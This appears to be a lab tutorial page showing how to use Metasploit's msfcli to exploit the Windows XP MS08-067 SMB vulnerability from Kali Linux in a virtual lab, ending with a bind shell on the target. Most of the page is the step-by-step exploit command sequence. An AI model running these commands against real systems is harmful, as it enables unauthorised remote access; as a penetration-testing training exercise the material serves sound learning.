top of page

Metasploit MSFCLI

Metasploit MSFCLI stands for Metasploit Command Line Interface. It can be used for testing modules developed by you. It is useful when using metasploit inside the scripts. It uses one line command. Let’s try to exploit the same Windows XP MS08-067 Vulnerability using MSFCLI.



Deliverable:


Lab Set up

  • Virtualization using Oracle Virtual box

  • Attacker’s System: Kali Linux

  • Target System : Windows XP

In Kali Linux --> Terminal



1. To know about msfcli options

~# msfcli –h (Enter)


Here, -h --> help


2. Using ms08-067 exploit in msfcli.

~# msfcli windows/smb/ms08_067_netapi O (Enter)


Here, O --> alphabet O for Options i.e. Show Options



3. Setting target IP and finding available payloads.

~# msfcli windows/smb/ms08_067_netapi RHOST = [IP address of target Windows XP] P (Enter)


Here, P --> Show payloads



4. Using any payload as per need.

Ex. ~# msfcli windows/smb/ms08_067_netapi RHOST = [IP address of target Windows XP] PAYLOAD = windows/shell_bind_tcp E


Here, E --> exploit



5. Now we will get the shell of the target system and we can execute any commands we want to with that system.


bottom of page